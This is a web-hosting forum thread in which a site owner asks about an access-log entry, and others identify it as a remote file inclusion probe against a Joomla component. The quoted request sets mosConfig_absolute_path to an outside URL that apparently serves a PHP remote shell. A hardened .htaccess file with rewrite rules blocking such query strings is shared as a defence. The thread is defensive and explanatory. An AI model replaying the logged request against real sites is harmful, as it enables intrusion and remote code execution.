06/Apr/2011:16:08:22 -0400] "GET /mermaid.shtml//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.akouavie.com/libraries/pear/a? HTTP/1.1" 200 10511 "-" "Mozilla/5.0"
151.27.211.230


I see these types of entries in my log files, just wondering what they are?

Thanks

Those are probes against your site, most likely by zombies, trying to exploit security vulnerabilities via cross site script injections through unsanitized external variables (in this case: mosConfig_absolute_path) that is later used in a PHP include() or a require()... In this case, they are probing for a Joomla! vulnerability...

Most likely, the 'http://www.xxxxx/libraries/pear/a' file is a PHP remote shell which attackers can use to gain access to your account as it will run with your user and group credentials...

Why they tried this against a '.shtml' file is beyond me as they seem to be casting the net out pretty wide...

Oh thanks for that info Terra, can I just ignore these then?

If you aren't running Joomla!, then you should be fine...

However, as a cautionary tale, please keep your operations up to date as these rogues can hit your site at any time trying to sniff out vulnerable software...

If you are running Joomla, I have a idea how you can block such things...
You have to check following things:

1.) Do you have the .htaccess file of Joomla activated? If not, do so
2.) Add following code to your .htaccess file... the important things are red marked!!
3.) Password protect your administration directory!!


### Pwd-Protection of configuration.php
AuthUserFile /big/dom/xDOMAIN/.sys_opr_dir/CNC_Protect/.passwd
AuthName Protected_Area
AuthType Basic
<Files "configuration.php">
require user USERNAME
</Files>

##
# @version $Id: htaccess.txt 14401 2010-01-26 14:10:00Z louis $
# @package Joomla
# @copyright Copyright (C) 2005 - 2010 Open Source Matters. All rights reserved.
# @license http://www.gnu.org/copyleft/gpl.html GNU/GPL
# Joomla! is Free Software
##


#####################################################
# READ THIS COMPLETELY IF YOU CHOOSE TO USE THIS FILE
#
# The line just below this section: 'Options +FollowSymLinks' may cause problems
# with some server configurations. It is required for use of mod_rewrite, but may already
# be set by your server administrator in a way that dissallows changing it in
# your .htaccess file. If using it causes your server to error out, comment it out (add # to
# beginning of line), reload your site in your browser and test your sef url's. If they work,
# it has been set by your server administrator and you do not need it set here.
#
#####################################################

## Can be commented out if causes errors, see notes above.
Options +FollowSymLinks

#
# mod_rewrite in use

RewriteEngine On

########## Begin - Rewrite rules to block out some common exploits
## If you experience problems on your site block out the operations listed below
## This attempts to block the most common type of exploit `attempts` to Joomla!
#
## Deny access to extension xml files (uncomment out to activate)
#<Files ~ "\.xml$">
#Order allow,deny
#Deny from all
#Satisfy all
#</Files>

RewriteCond %{QUERY_STRING} ^(.*)http://(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)https://(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)ftp://(.*) [OR]

## End of deny access to extension xml files
RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR]
# Block out any script trying to base64_encode crap to send via URL
RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [OR]
# Block out any script that includes a <script> tag in URL
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
# Block out any script trying to set a PHP GLOBALS variable via URL
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
# Block out any script trying to modify a _REQUEST variable via URL
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
# Send all blocked request to homepage with 403 Forbidden error!
RewriteRule ^(.*)$ index.php [F,L]
#
########## End - Rewrite rules to block out some common exploits

# Uncomment following line if your webserver's URL
# is not directly related to physical file paths.
# Update Your Joomla! Directory (just / for root)

# RewriteBase /


########## Begin - Joomla! core SEF Section
#
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond %{REQUEST_URI} !^/index.php
RewriteCond %{REQUEST_URI} (/|\.php|\.html|\.htm|\.feed|\.pdf|\.raw|/[^.]*)$ [NC]
RewriteRule (.*) index.php
RewriteRule .* - [E=HTTP_AUTHORIZATION:%{HTTP:Authorization},L]
#
########## End - Joomla! core SEF Section



Be aware, this was the original .htaccess file from Joomla. I manually edited the .htaccess file to improve security of my Joomla installation. Make a copy of your original file if something goes wrong.

xDOMAIN: is found in your CNC
USERNAME: this should be an existing username from your automated CNC passwort protection.

If you have any questions, send me a short private message.

Manfred

Oh thanks guys, I'm not running Joomla so I should be okay, but what are my operations and how do I keep those up to date?

Terra means that you should keep your installed scripts up-to-date. ;)
If your scripts are out of date, it could be possible that your website gets hacked.

Thank you manfred! I will do that.